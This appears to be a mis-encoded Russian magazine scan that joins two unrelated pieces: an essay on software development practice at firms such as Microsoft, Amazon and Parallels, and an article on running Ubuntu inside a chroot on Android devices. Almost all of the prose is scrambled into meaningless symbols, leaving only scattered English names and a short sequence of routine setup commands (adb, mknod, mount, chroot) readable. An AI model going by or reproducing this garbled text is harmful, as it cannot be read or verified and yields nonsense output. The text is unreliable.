02MI!HM — NOC FB PCHBB, QBR 2D9CICS+OIC 9 SBT+OI!U ?:*# =: )*#$'# <&1&90)*0"+ 5–10 '(,0@ 5*(.':@ #,0=#8. C<-:6- )*&$%<,(#)5 $;$-7"$&"*, -, 6,6 &)$@7, - :1&,$# ) *<-:6,/-, )6*%$$ &)$@*, @.,&"1$ )%$7- "-A &*&)$ "$ #$, 6*#*%1$ 5 )=-#,( @.,&"1/-.

A#)"(.0"+ '&<1#"0.#1&90.:B ).#% <1(.0* '&.#37#$'#. F$&,;"* — 3,6*"1 ?#* -.- >%,-&-., %,3%,:*#6-. 0*?#*/4 5 &)$@7, )#,%,.)5 )#%*-#' >%*G$))1, >*"-/,5, =#* *:53,#$.'"* &*3"-6"4# )-#4,G--, & A*7$ 6*#*%1A >%*G$)) :47$# ",%4<$". F-=$@* )#%,<"*@* & ?#*/ "$#. C)*:$""* & ",=,.$, 6*@7, 4 &,) $E$ /,.$"'6,5 6*/,"7, & 10–50 =$.*&$6, %*.' >%*G$))*& "$ *=$"' &,;",.

C D#))00 #9&'+ .($'# )"1#0"+ <1#4&)): ) )(7#5# '(9(*( — ) )(7#5# 70'07(*+'#5# 1(37&1( )"(1"(<(. I M/$%-6$ =$.*&$6, >*%,-:*#,&<-8 & Microsoft - >%-<$7<-8 & Amazon, "$ &)#%$=,$# 7.5 )$:5 "-=$@* 47-&-#$.'"*@*. 0*#*/4 =#* & Amazon >%-/$%"* 60% .(7$8 — >$%$:$;=-6- -3 Microsoft. 0%-75 & Google, *" #*;$ "$ &)#%$#-# "-=$@* 47-&-#$.'"*@*. 0%*-G$))1 & %,3"1A 6*/>,"-5A >*A*;-. I 2*))-- 6*/>,"-8, >*)#%*-&<-A -";$"$%"1$ >%*-G$))1, *=$"' /,.*. M *# -";$"$%"1A >%*G$))*& 3,&-)-# 6,=$)#&* >%*746#,. B).- >%*G$)), "$#, &17,#' ",-@*%, 6,=$)#&* "$&*3/*;"*.

A<()0=# VMware 3( "#, 9"# #'( 1&,0*( ) '(70 8#'82101#.("+, — =*(5#%(16 >"#72 7:

7'#5#72 '(290*0)+. S.5 #*@* =#*:1 4)>$<"* >%*#-&*)#*5#' #,6*8 6*/>,"--, "4;"* -/$#' "*%/,.'"4( 64.'#4%4 %,3%,:*#6- - "*%/,.'-"1$ >%*G$))1.

D('# 0*0 <#3%'# "#9'# <10@#%0")6 %&*&-501#.("+ #".&")".&''#)"+. !",=$ 6*"#*%, "$ &1;-&$#. R-6%*/$"$7;/$"# -/$$# "$7*-)#,#*6 — $).- *" >%*7*.;,$#)5 &)$ &%$/5, *" 7$/*#-&-%4$# .(7$8. C"- >%*)#* 3,"-/,(# >*3-G-( «=#* )6,;4#, #* - :474 7$.,#'». 9,6 ",=,.')#&* >%-74/,$#, #,6 - :47$#. V.,&"*$ — )7$.,#' &)$, =#* )6,3,.* ",=,.')#&*, - >%--6%1#' )$:5 )* &)$A )#*%*". N#* 4:-&,$# .(:4( -""*&,G-*""4( 6*/>,"-(.

!&*#.&8 %#*$&' 07&"+ <1(.# '( #,0=82 0 '( .:=#1 )#=)".&''#5# <2"0. F* &1:*% )*:)#&$""*-@* >4#-... =#*:1 =$.*&$6 >%,&-.'"* ?#* )7$.,., *" #*;$ 7*.;$" :1#' ",#%$"-%*&,". +6,;$/, &1 &$7' "$ %,3%$<-#$ )&*$/4 @*7*&,.*/4 %$:$"-64 A*7-#' >* .$)#"-G,/ ),/*)#*5#$.'"* — *" )>*#6"$#)5 - ).*/,$# <$(. I1 7,$#$ $/4 %464 - &$7$#$ 3, %464. Q$.*&$6, >%$7&,%-#$.'"* "4;"* )>$G-,.'"* #%$"-%*&,#'.

Microsoft 1(31(=#"(*( ).#& .0%&'0& 0 ).#B <1#4&)), 8#"#1:B 7: (8"0.'# 3(07)".#.(*0. C"- -3*:%$.- %*.' >%*@%,//-/$"$7;$%,, QA-/$"$7;$%,, dev-.-7, — ?#* #%-,7,, 6*#*%,5, >* )4#-, %,:*#,$# ",7 >%*$6#*/. Microsoft %,3-%,:*#,. &)$ ?#* >*#*/4, =#* >$%-*7, 6*#*%18 )$8=,) >$%$;-&,$# Parallels, *"- >$%$;-.- $E$ &* &%$/$", /,/*"#*&.

C'(9(*& 7: #=1(E(*0 70'07(*+'#& .'07('0& '( <1#4&)):. S,, 4 ",) :1. source control, -",=$ >%*)#* "$&*3/*;"* 6*..$6#-&"* %,:*#,#' ",7 6*7*/. S,, ) ),/*@* ",=,., 4 ",) :1. bug tracking — 7,&,. * )$:$ 3",#' ",< *>1# ) ,4#)*%)"1A &%$/$". F* &*# requirement managament 4 ",) "$ :1.*. R"*@-A 7%4@-A &$E$8 #*;$ "$ :1.*, ",>%-/$% code review. 0*-"5#-$ ,&#*/,#-=$)6*@* #$)#-"@,... ",/ >*&$3-.*: 6*"#$8"$%1 — #,6,5 #$A"*.*@-5, =#* ",/ >%-<.*)' *3,:*#-#')5 ?#-/ %,"*, "* -3",=,.'-"* ?#*@* "$ :1.* #*;$. 2,34/$$#)5, 4 ",) $)#' &"4#%$""-$ >*%#,.1, /1 -)>*.'34$/ - Wiki, - Sharepoint. B)#' - ,":*%7-"@->%*G$)), $)#' - 6*4=-"@. P$3 ?#*@* "$&*3/*;"* )4E$)#&*&,#'.

;#5%( 6 =:* 7#*#%:7, 6 )90"(*, 9"# 7#$'# )%&*("+ <#*'2/ %#827&'"(40/ '( <1#%28", "&@'#*#50/. F$#, "$&*3/*;"*, >*.4=,$#)5 ).-<6*/ :*.'<*8 overhead. S*.;$" :1#' 37%,&18 )/1)., &* /"*@*/ *#7,""18 ", *#64> %,3%,:*#=-6,/ - 6.(=$&1/ .(75/.

C F7&108& <0,2" =#*+,& %#827&'"(400 "$ >*#*/4, =#* *"- -7-*#1 -.-, ",*:*%*#, *=$"' 4/"1$. 0%*)#* *"- 6%*&'( 3,>.,#-.- 3, >*"-/,"-$ >*.'31 *# ?#*8 7*64/$"#,G--.

G51#7'#& 8#*09&)".# */%&B '&)<#)#='# '(<0)("+ %#827&'"(40/. R*;"*, 6*"$="*, -A 3,)#,&.5#', >*)1.,#' ", 64%)1, "*, 6 )*;,.$-"-(, ?#* "$ *=$"' >*/*@,$#. O,6;$ $)#' .(7-, 6*#*%1$ >-<4# 7*64/$"#,G-( *A*#"*, -/ ?#* "%,&-#)5. F4;"* >**E%5#' -A 7$.,#' #,6-$ &$E-. I *:E$/, &)$ 6,6 *:1="* — )$%$:%5"*8 >4.- "$#.

2MPCOM + 9CRMFSCT H1#4&)) 0'"&1.+/ 2 '() #"'#)0"&*+'# '&I#1-7(*03#.('':B, "* /1 )#,%,$/)5, =#*:1 :1.*

/-"-/4/ #%- -"#$%&'(, ", 6,;7*$ -3 6*#*%1A *#&*7-#)5 =,). F, -"#$%&'( >%-A*7-# *7-" =$.*&$6. N#* &,;"*.

J'"&1.+/ 8#70"&"#7 — 5*2<(6 .&E+, 9"# 7: 2$& .:290*0 '( )#=)".&''#7 #<:"&. S$.* & #*/, =#* 6*@7, ) 6,"7-7,#*/ %,3@*&,%-&,(# "$)6*.'6* =$.*&$6, 4 "-A )%,34 ;$ *:%,34$#)5 $7-"*$ /"$"-$. B).- *"- @*&*%5# >* *#7$.'"*-)#- — "$ L,6#, =#* *"* :47$# $7-"1/.

K( 0'"&1.+/ 6 3(%(/ .#<1#): "1&@ "0<#.. 0$%&18 — >%*)#* ;-3"$""18, ", *:E4( ,7$6&,#"*)#'. I#*%*8 — ", )**:%,;,.64. O%$#-8 — ?.$/$"#,%"1$ &$E-, >*/*@,(E-$ >*"5#', =#* >*7@*#*&6, )*-)6,#$.5 "$ )*&)$/ :$3",7$;",. F,>%-/$%, /1 )>%,<-&,$/, 6,6 6*/>-.5#*% =#*-"-:47' ", )#$6 >*.*;-#. 0%*)#* =#*:1 4&-7$#', $)#' .- 4 =$.*&$6, >*"-/,"-$ *)"*&.

C )#I".&1'#7 0'$0'010'5& .)& 3(%(90 '&)<&40I0401#.(': %# 8#'4(. 0*?#*/4 $)#' $E$ *7", &,;",5 =,)#' -"#$%&'(: >*"5#', ",)6*.'6* =$.*&$6 :1)#%* - A*%*<* )**:%,-;,$#. F,&$%"56, &1 ).1<,.- >%* &*>%*)1 7.5 )*:$)$7*&,"-5 & Google: <,%-6- & ,&#*:4)$, >*/1#' )#$6.,... N#- 3,7,=6- "$ *:53,#$.'-"* 7*.;"1 :1#' >%* <,%-6- & ,&#*:4)$. C"- "$ ", .*@-64. !7$5 & #*/, =#*:1 >*)/*#%$#', 6,6 A*%*<* =$.*&$6 >*7A*7-# 6 %$<$"-( "$)>$G-L-G-%*&,""1A 3,7,=. 9*@7, 4).*&-5 ?#*8 3,7,=- >%-A*7-#)5 )#,&-#' ),/*/4.

C)&@ 8('%0%("#. 9&1&3 )&=6 '& <1#<2)8(/. I)$A 5 :1, ",&$%"*$, )$8=,) 4;$ "$ >*#5"4.. D ",) $)#' )#,#-)#-6,... 74/,(, & "$7$.( 4 ",) >%*A*7-# *6*.* 30–50 -"#$%&'(. H(7$8 /1 -E$/ >*)#*5""*.

L#1#,0B, #9&'+ 5*2=#80B 9&*#.&8 0E&" 1(=#"2 1&%8#. N#* >%*-)A*7-# %,3 & 5–10 .$#, >*#*/4 =#* 6*"#*%, ",6%1.,)', *#7$. %,3*@",.- -.- $/4 7,.- ",=,.'"-6,, 6*#*%18 >%-"5.)5 7$-/*")#%-%*&,#' )&*$ ?@*, - =$.*&$6 "$ &17$%;,..

;#7('%( — >"# #9&'+ .($'#, >"# )(7#& .($'#& . )#I".&1'#7 =03'&)&. +4>$%6&,.--L-G-%*&,""1$, )4>$%*>1#"1$, /*#-&-%*-&,""1$ %,:*#*8 - -"#$%$)"1/- >%*$6#,/- .(7- &)#%$=,(#)5, "* *=$"' %$76*. !/$""* >*?#*/4 "4;"* -"#$%&'(-%*&,#' &)$ &%$/5, -",=$ #,6-$ .(7- "$ :474# >*>,7,#')5 &*&)$. B).- ;$ #,6*8 =$.*&$6 ",A*7-#)5, 6*@7, 4 6*/>,"-- >%-*)#,"*&.$" ",$/, $@* &)$ %,&"* "4;"* 3,#,)6-&,#' & 6*/>,"-(, "$)/*#%5 ", )*>%*#-&.$"-$ 6*@* 4@*7"*. N#* %$76-$ .(7-.

D&(*+'(6 4&''#)"+ Parallels 3(8*/9&'( . "#7, 9"# '(3:.(&")6 0'"&**&8"2(*+'#B )#=)".&''#)"+/. N#* 6*7, 6*#*%18 /1 ",>--),.-. F* "$ #*.'6* *". P$3 #*@*, =#* & @*.*&,A .(7$8, ?#*# 6*7 "$ -/$$# )/1).,. H(:*8, 6#* &*3'/$# $@* - >*>1#,$#)5 =#*-#* ) "-/ )7$.,#', ",)#4>-# ", *@%*/"*$ 6*.-=$)#&* @%,:.$8, ", 6*#*%1$ /1 4;$ ",)#4>-.-. ! 7,;$ $).- >*->%*)-#' ",) %,))6,3,#' *: ?#-A @%,:.5A — /1 "$ )/*;$/. C"- *:A*75#)5 -")#-"6#-&"*, &)$ >%5/* 6,6 4 *>1#"1A ),>$%*&.

M 2.&1&', 9"# '(,07 %1(B.&1#7 1#)"( =:* '& <1#%28". S%,8&$% %*)#, — ?#* &)$@7, .(7-. I ",<$/ ).4=,$ 7%,8&$%*/ %*)#, &1)#4>,.* ",<$ "$4$/"*$ ;$.,"-$ 7$.,#' >%*746#1, , #,6;$, /*;$# :1#', "$6,5 ",<, :$)#*.6*&*)#'. z

!"#$%&'() *#'+,-. (androidstreet.ru)

!"#$% 09 /164/ 2012032

COVERSTORY

!"#$%# &#'&() *()*#+# '"()(*, & )#)(*-. '/01&2. 0("'/3 &)."-4#*#' 0#5 10".'%(*,() 67 Android 5# -#+#, 2.2 8*-19,.&-/ *.1:,%,&; 9.01&2.-; *. *,3 0#%*#<(**/( 5,&-",=1-,'/ Linux. 7(+#5*> )(-#5,2,

1&-.*#'2, Linux-5,&-",=1-,'#' *. Android-1&-"#?&-'. $,"#2# ,9'(&-*/, . ' "(0#9,-#",, Google Play (&-; 5.@( .'-#).-,9,"#'.**/( &,&-()/ 1&-.*#'2, , 9.01&2. Linux. A 8-#? &-.-;( > 0#0/-.B&; .221)1%,"#'.-; '(&; *.2#0%(**/? #0/- ".=#-/ & Linux *. &)."-4#*.3, ".&&2.@1, 9.:() 8-# *1@*#,

, 0#2.@1, 2.2 ,9=(@.-; '#9)#@*/3 0#5'#5*/3 2.)*(? 0", 0("(*#&( Linux *. &)."-4#* ,%, 0%.*$(-.

&'()*+) ,- *./01-/2

!" #$%&'(!)*+,-*+./?

!"#$%$&'(&$)* LINUX-+("#,(-!#(& %$ #)')./% ( 0'$%1)# 0/+ !0,$&')%()* ANDROID

!"#$%&$ '( %)*+,(*- ,. /'"0$+,1()23()%4?

!"#$% 09 /164/ 2012 033

BackTrack, !"#$%&''() '" #*"'+&,&

AndroidVNC — #-./*01"&234 / 5"6-1&2$ 3,-*$

5678!? 9% 1"+3-: 3;2'<* =,>"$ 1,0%;%$?@< @$+%))-=, #$, 0$,-$, 1-$%"$@< ;%1A@$($? )% =,.('?),= A@$+,:@$3" ,1"+%B(,))A& @(@$"=A, 3 1+()B(1" )" 1+"*)%;)%#"))A& *'< +%.,$- @ /0+%),= )".,'?C(4 +%;="+,3 ( ."; *,@$%$,#), $,#),2, =%)(1A'<$,+% (=-C() ( 0'%3(%-$A+-. D*)%0, )" @$,($ *"'%$? 1,@1"C)-4 3-3,*,3. E(@$+(.A$(3 Linux =,>"$ *%$? 3'%*"'?BA @=%+$F,)% *,@$%$,#), =),2, 1+"(=A-G"@$3, @+"*( 0,$,+-4 )%.,+ @$%+-4 1+,3"+"))-4 ()@$+A=")$,3, $%0(4 0%0 A$('($- 0,=%)*),: @$+,0(, 1+,*3()A$-" +"*%0$,+-, FTP- ( SSH-@"+3"+-, @"$"3-" ()@$+A=")$- ( @+"*@$3% +%;+%.,$0( 1+(',>")(:. 5%1A@$(3 Linux ."; 2+%F(#"@0,: ,.,',#0( )% @=%+$-F,)" @ 4%+*3%+),: 0'%3(%$A+,: (Motorola Droid, 0 1+(="+A), =,>), *,@$%$,#), 0,=F,+$), 3@"= /$(= 1,'?;,3%$?@< 1+<=, )% 4,*A ."; )",.4,*(=,@$( 1,0(*%$? @%= Android. H@" ()@$+A=")$- *,@$A1)- 3 '&.,: =,=")$, % @=%+$F,) 1+,*,'>%"$ ,@$%3%$?@< @=%+$F,),=, 1,;3,'<< 1+()(=%$? ;3,)0( ( @'AC%$? ()$"+)"$-+%*(,.

H$,+,: %+2A=")$ ;% A@$%),30A Linux )% @=%+$F,)" — /$, 3,;-=,>),@$? (@1,'?;,3%$? "2, 3 0%#"@$3" 1"+"),@),: +%.,#": @$%)-B((, 0,$,+A& =,>), 1,*0'&#($? 0 '&.,=A IJ ( $A$ >" 1,'A#($? *,@$A1 0 $"+=()%'A @ 1,=,G?& SSH/Telnet-0'(")$% '(., 0'(")$% VNC/RDesktop. K$, 1, ,1+"*"'")(& 'A#C", #"= F'"C0( @ A@$%),3-'"))-= Linux, $%0 0%0 )"$ )",.4,*(=,@$(, 3,-1"+3-4, 1"+";%2+A->%$? =%C()A, % 3,-3$,+-4, 2,)<$? $A*%-@&*% *%))-"; +";A'?$%$- $3,": +%.,$- .A*A$ *,@$A1)- @+%;A 1,@'" $,2,, 0%0 ,$0'&#(C? @=%+$F,) ,$ 0,=1%.

9%0,)"B, )%(.,'?C(: 3-(2+-C Linux *%"$ )% 1'%)C"$%4, /0+%) 0,$,+-4 1,;3,'<"$ .,'""-=")"" @),@), +%.,$%$? 3 2+%F(#"@0,: @+"*", % 3,;=,>),@$? 1,*0'&#($? =-C? ( 0'%3(%$A+A #"+"; OTG-0%."'? $%0 ( 3,,.G" *%"$ C%)@ 1+"3+%$($? 1'%)C"$ 3 1,'),B"))A& +%.,#A& @$%)B(&. I+( /$,= )(0%0,: ,@,.,: +%;)(B- =">*A A@$%-),30,: *(@$+(.A$(3% Linux )% 1'%)C"$ ( @=%+$F,) )"$.

J6J? I"+")"@$( Linux )% Android *":@$3($"'?), 1+,@$,, ( 2'%3)A& +,'? ;*"@? (2+%"$ <*+, Linux. L&.,: Linux-*(@$+(.A$(3 1+"*@$%3'<"$ @,.,: )%.,+ 1+(',>")(: ( .(.'(,$"0, +%.,$%&G(4 1,3"+4 <*+% Linux, % $%0 0%0 Android @%= ,@),3%) )% 1,#$( )" (;=")")),= <*+" Linux, /$( 1+(',>")(< ( .(.'(,$"0( =,>), ."; 0%0(4-'(., 1+,-.'"= ;%1A@$($? 3)A$+( @+"*- Android. E,@$%$,#), '(C? 1,*-@0%$? *(@$+(.A$(3, *'< 0,$,+,2, @AG"@$3A"$ 1,+$ )% 1'%$F,+=A ARM ()" ;%.-3%"=, #$, 99% 3@"4 Android-*"3%:@,3 +%.,$%&$ )% ARM), A@$%-),3($? "2, @ 1,=,G?& ARM-/=A'<$,+% )% 3(+$A%'?)-: >"@$0(: *(@0 ($, "@$? 3 F%:'), @0()A$? /$,$ F%:' )% SD-0%+$A A@$+,:@$3%, ,$0+-$? $"+=()%', @=,)$(+,3%$? ,.+%; 3 0%#"@$3" loopback-A@$+,:@$3% ( @*"'%$? chroot 3)A$+?. H@"! K$, $%0 >" 1+,@$,, 0%0 ;%1A@0 FTP-@"+3"+% 3 chroot-,0+A>")(( — 1+,@$,: ( 1+,3"+"))-: *"@<$('"$(<=( ="$,*.

8*()@$3"))-: 0%=")? 1+"$0),3")(<, 0,2*% $- +"C%"C? ;%-1A@$($? *(@$+(.A$(3 Linux 3)A$+( Android, — 2+%F(#"@0%< @+"*%.

H $, 3+"=< 0%0 @ *,@$A1,= 0 0,)@,'( )(0%0(4 $+A*),@$": )" 3,;-)(0%"$ .'%2,*%+< )%'(#(& 1,'),B")),2, /=A'<$,+% $"+=()%'%, @ 2+%F(#"@0(=( 1+(',>")(<=( )%#()%&$@< 1+,.'"=- — )%$(3),2, X-@"+3"+% *'< Android )"$, % ;%1A@$($? ,.-#)-: X-@"+3"+ 3)A$+( @%=,2, *(@$+(.A$(3% )"3,;=,>), (;-;% 0,+"))-4 ,$'(#(: 3 %+4($"0$A+" 2+%F(#"@0,: 1,*@(@$"=- ;"'"),2, +,.,$%. 9"@=,$+< )% $, #$, 3 ,@),3" ,)% (@1,'?;A"$ @$%)*%+$)-: Linux Framebuffer, 1,3"+4 0,$,+,2, =,>), ;%1A@$($? X-@"+3"+, /0@0'&;(3)," 1+%3, "2, (@1,'?;,3%)(< (;)%#%'?), 1+()%*'">($ .,'"" 3-@,0,A+,3)"-3-= .(.'(,$"0%= Android, 1,/$,=A ,@$%"$@< '(., ;%2+A>%$? Linux-*(@$+(.A$(3 3="@$, Android (#$, @,3"+C")), )"1+%0$(#),), '(., 1+(*A=-3%$? ,.4,*)-" 1A$(.

K)$A;(%@$- 3-C'( (; /$,: @($A%B((, (@1,'?;A< 1+,@$,: ="$,* «A*%'")),2,» 1,*0'&#")(< 0 +%.,#"=A @$,'A @ 1,=,G?& '&.,2, *,@$A1),2, *'< Android VNC-0'(")$%. H)A$+( chroot-,0+A>")(< ;%1A@0%"$@< X-@"+3"+ Xvnc, ( 3@" 1+(',>")(< +%.,$%&$ 1,* "2, A1+%3'")("=. I,'?;,3%$"'& ,@$%"$@< '(C? A@$%),3($? VNC-0'(")$, 3.($? ',0%'?)-: %*+"@ — ( 3A%'<, )% /0+%)" 1,<3'<"$@< 1,'),B"))-: +%.,#(: @$,'.

8*()@$3"))," A;0," ="@$, 1+( (@1,'?;,3%)(( A*%'")),2, +%.,#"2, @$,'% — /$, 1+,(;3,*($"'?),@$?. E%>" +%.,$%< ',0%'?-),, VNC )" =,>"$ ,."@1"#($? *,'>)-: "" A+,3")?, 0,$,+,2, .- 43%$(', *'< 1'%3),: 1+,0+A$0( ('( 1"+"="G")(< ,0,) ."; '%2,3. M"C($? /$A 1+,.'"=A 1,0% )" A*%',@?, 1+,"0$- +%;+%.,$0( )%$(3-),2, X-@"+3"+%, 0,$,+-: .- (@1,'?;,3%' 2+%F(#"@0A& 1,*@(@$"=A Android, "G" ,#")? @-+- ( )" =,2A$ .-$? (@1,'?;,3%)- *'< ;%1A-@0% 1,'),B"))-4 2+%F(#"@0(4 @+"*. H1+,#"=, )(0$, )" ;%1+"G%"$ (4 (@1,'?;,3%$?; 0 1+(="+A, X Server ,$ Darkside Technologies Pty Ltd (goo.gl/ap3uD) 31,')" @2,*($@< *'< ;%1A@0% 1+,@$,2, @,F$%.

N;)%#%'?), Linux *'< Android @AG"@$3,3%' $,'?0, 3 3(*" ,.+%-;% @ A>" A@$%),3'")),: @(@$"=,:, % $%0>" 1,<@)($"'?),: ()@$+A0-

!"#$% 09 /164/ 2012034

COVERSTORY

!"#$ %&% '()( )*+&, -).%/01"(2 " "3-)/2,)4&(2. 5&(#6 -)74"/"32 3%+"-(8, %)()+8# &4()6&(","+)4&/" -+)!#33 -).%/01#9"7 )*+&,& " ,&-:3%& Linux, 9) " )9" (+#*)4&/" 9#%)()+)$ +&*)(8 ;)/)4)$. <&%)9#!, 4 -)3/#.9## 4+#67 -)74"/"32 "93(&//7()+8, .)3(:-98# 4 Google Play (9&-+"6#+, goo.gl/RSA1j), 4 9#%)()+)$ 3(#-#9" &4()-6&(","+:0="# -+)!#33 ,&-:3%& ."3(+"*:("4&, >)(7, -) 3:(", '() 43# () ?# +:%)4).3(4) -) :3(&9)4%#, 9) "9(#+&%("49)#, 3 -+7686" 338/%&6" 9& 3%&1"4&9"# )*+&,)4 " 3%+"-()4.

@ABCDE<@CFG<HD G@EF@<CH G8I# 7 :?# :-)679:/ ) ()6, 1() ."3(+"*:("4 Linux 4-)/9# 6)?#( *8(2 ,&;+:?#9 46#3() Android, */&;).&+7 1#6: :.&3(37 ,&.#$3(4)-4&(2 Framebuffer ./7 -+76);) .)3(:-& % 4".#)&.&-(#+: " 3:=#-3(4#99) :3%)+"(2 +&*)(: ;+&J"1#3%);) "9(#+J#$3&. K.9&%) .#/&(2 '() 9& 36&+(J)9# -+&%("1#3%" *#33683/#99) — Linux 9#-+";).#9 4 %&1#3(4# )39)49)$ 3"3(#68 9& 9#*)/2I"> '%+&9&>, % ()6: ?# -+"9"6&(2 ,4)9%" " -)/2,)4&(237 "9(#+9#()6 *:.#( 9#4),6)?9). @ 4)( 9& -/&9I#(# Linux *:.#( 48;/7.#(2 4-)/9# .)3()$9).

K*819) 9& :3(+)$3(4), ",9&1&/29) +&*)(&0=## -). :-+&4/#9"-#6 Android, (&% 9&,84&#6&7 9&("49&7 4#+3"7 Linux-."3(+"*:("4& :3(&9&4/"4&#(37 3/#.:0="6 )*+&,)6. <& 49:(+#99#6 NAND-9&%)-"(#/# -/&9I#(& 3),.&#(37 .)-)/9"(#/298$ +&,.#/, 9& %)()+8$ %)-"+:#(37 Linux-."3(+"*:("4. 5&(#6 ,&;+:,1"% U-Boot ()9 -+"6#97#(37 4 *)/2I"93(4# -/&9I#()4) 9&3(+&"4&#(37 (&%"6 )*-+&,)6, 1()*8 "3-)/2,)4&(2 '()( +&,.#/ 4 %&1#3(4# ,&;+:,)19);). G +#,:/2(&(# -/&9I#( *:.#( &4()6&("1#3%" ,&;+:?&(2 Linux-3"3(#6: -)3/# 4%/01#9"7 -"(&9"7.

L()*8 )3(&4"(2 4),6)?9)3(2 ,&;+:,%" Android, ,&;+:,1"% U-Boot -#+#9&3(+&"4&0( (&%"6 )*+&,)6, 1()*8 +&,.#/ 3 Linux-3"3(#6)$ *8/ 9# )39)4986, & 48-)/97/ J:9%!"0 «+&,.#/& ./7 4)33(&9)4/#9"7» (Recovery Mode), .)3(:-9);) 3 -)6)=20 4%/01#-9"7 :3(+)$3(4& 3 ,&?&()$ %/&4"I#$ ;+)6%)3(" (()( 3&68$, %)()+8$ "3-)/2,:#(37 ./7 -#+#-+)I"4%" :3(+)$3(4& " 48-)/9#9"7 +&,-/"198> 4)33(&9)4"(#/298> )-#+&!"$). C&%"6 )*+&,)6 :.&#(37 -)/:1"(2 :3(+)$3(4) 3 .4)$9)$ ,&;+:,%)$: Android -) :6)/1&9"0 " ."3(+"*:("4 Linux -+" ,&;+:,%# 4 +#?"6# 4)33(&9)4/#9"7. M&6 Recovery Mode -+" '()6 )3(&#(37 .)3(:-986 ()/2%) 3 -)6)=20 3-#!"&/298> "93(+:6#9()4.

G 3/:1&# #3/" NAND--&67(" )%&,84&#(37 9#.)3(&()19) ./7 +&,6#=#9"7 -)/9)!#99)$ Linux-3"3(#68, ## 1&3(" ()*819) +&,.#/ /usr) 489)37( 4 )*+&, "/" +&,.#/ 9& SD-%&+(#. N3(&(", ext2-+&,.#/ 9& %&+(# -&67(" (&%?# 6)?9) "3-)/2,)4&(2 ./7 :3(&9)4%" Linux, ,&-:3%&#6)$ 4 chroot-)%+:?#9"".

O3(&9)4"(2 9&("498$ Linux-."3(+"*:("4 3/)?9##, 1#6 +&*)-(&0="$ 4 chroot-)%+:?#9"", 9) '() 3()"( ();), #3/" : (#*7 #3(2 -/&9I#( " OTG-%&*#/2, 3 -)6)=20 %)()+);) 6)?9) -).%/01"(2 %/&4"&(:+: " 68I2.

PE@NCFLDMNKD 5@<QCFD N&% 7 :?# ;)4)+"/, ./7 ,&-:3%& -). :-+&4/#9"#6 Android -+"-;).98 ()/2%) ."3(+"*:("48, -)+("+)4&998# 9& &+>"(#%(:+: ARM. P+#?.# 43#;) '() Ubuntu " Debian, -+"1#6 -#+48$ -) -)97(986 -+"1"9&6 -)/2,:#(37 ;)+&,.) *)/2I"6 "9(#+#3)6 3+#." +)*)()-4).)4. C&%?# 6)?9) :3(&9)4"(2 Gentoo " 9#3%)/2%) 3-#!"&/","-+)4&998> ."3(+"*:("4)4, 9&-+"6#+ Backtrack. E&336)(+"6 3&68$ ("-"198$ 3/:1&$, () #3(2 :3(&9)4%: Ubuntu -) 3(&9.&+(9)$ 3>#6#, *#, "3-)/2,)4&9"7 %&%">-/"*) &4()6&(","+)4&998> "93(&//7()-+)4 " -+)1#;).

R/7 9&1&/& 9&6 9:?#9 )*+&, ?#3(%);) ."3%& 3 :3(&9)4/#9986 ."3(+"*:("4)6. D;) 6)?9) 3),.&(2 3&6)6:, 4)3-)/2,)4&4I"32 '6:/7()+)6 QEMU, ).9&%) 4 347," 3 (#6, 1() -+)!#.:+& :3(&9)4%" &*3)/0(9) 3(&9.&+(9& " ("-"19&, )-"384&(2 ## 7 9# *:.:, & -+)-3() 9&-+&4/0 (#*7 -) &.+#3: goo.gl/9nvBi. 5.#32 /#?"( &+>"4 3 )*+&,)6, 9& %)()+8$ -+#.:3(&9)4/#9 Ubuntu 12.04 3 ;+&J"1#3%"6 )%+:?#9"#6 LXDE (*8/) *8 9#+&,:69) ,&-:3%&(2 Unity/GNOME 9& (#/#J)9#/-/&9I#(#). @+>"4 3/#.:#( +&3-&%)4&(2 " -)/)?"(2 J&$/ ubuntu.img 9& %&+(: -&67(". !"#$%& Ubuntu % #'(')*+ %,"-,'.'/' %&-0#,"

Ubuntu 1" Galaxy Tab 10.1

!"#$%&$ '( %)*+,(*- ,. /'"0$+,1()23()%4?

!"#$% 09 /164/ 2012 035

5%'"" )%*, 67,)$(+,3%$8 ,.+%9 ( 6*"'%$8 chroot 3 ,0+:;")(" *(6$+(.:$(3%. 5'< /$,2, ):;)- 1+%3% root, 1+,=(30% 6 1,**"+;-0,> .',#)-4 loopback-:6$+,>6$3 ( :6$%),3'"))-> busybox ((?"7 3 !%+0"$" 1, 9%1+,6: «busybox installer», 3 CyanogenMod "6$8 1, :7,'#%)(&). @,6'"*,3%$"'8),6$8 *">6$3(>:1. !"#$%&'() *)+,-".$ "($)/0',' & Android ((1,/ 0(", ).20.

+1"'0.&/"3 /4 5'$#("' Terminal Emulator). A(., 1,*0'&#%"7 67%+$B,)/1'%)="$ 0 0,71: ( 1,':#%"7 *,6$:1 0 $"+7()%': 6 1,-7,?8& adb:

$ cd ȣȧȦȰ-ȘȢ-Android-SDK/platform-tools$ sudo ./adb shell

C" 9%.-3%"7, #$, +";(7 ,$'%*0( 3 /$,7 6':#%" *,';") .-$8 30'&#"): «C%6$+,>0( ĺ 5'< +%9+%.,$#(0,3 ĺ D$'%*0% Android».

2. 6.,+7'() 8$'&' root:

$ su

3. 9.4:'() ;,.70.( loopback-+1"$.<1"&., 8.:#,=7'() # 0()+ .;-$'4 :/1#' / ).0"/$+() (>.:

# mknod /dev/block/loop255 b 7 255# mount -o remount,rw /# mkdir /mnt/ubuntu# mount -o loop,noatime -t ext2 \ /sdcard/ubuntu.img /mnt/ubuntu

E,*"+;(7," ,.+%9% *,';), 1,<3($86< 3 0%$%',2" /sdcard/ubuntu. @+,3"+8, #$,.- /$, .-', $%0.

4. 6.:#,=7'() &1( 0(.;?.:/)%( :,- $';."% :/1"$/;+"/&' &/$"+-',30%( @9:

# mount -t proc proc /mnt/ubuntu/proc# mount -t sysfs sysfs /mnt/ubuntu/sys# mount -o bind /dev /mnt/ubuntu/dev

5. A'1"$'/&'() "'#, 7".;% /4 chroot-.#$+2(0/- ).20. ;%,. 8.-,+7/"3 8.,0.B(00%< :.1"+8 & 9("3:

# sysctl -w net.ipv4.ip_forward=1# echo «nameserver 8.8.8.8» > /mnt/ubuntu/etc/resolv.conf# echo «nameserver 8.8.4.4» >> /mnt/ubuntu/etc/ resolv.conf# echo «127.0.0.1 localhost» > /mnt/ubuntu/etc/hosts

6. 6($(?.:/) & chroot-.#$+2(0/(:

# chroot /mnt/ubuntu

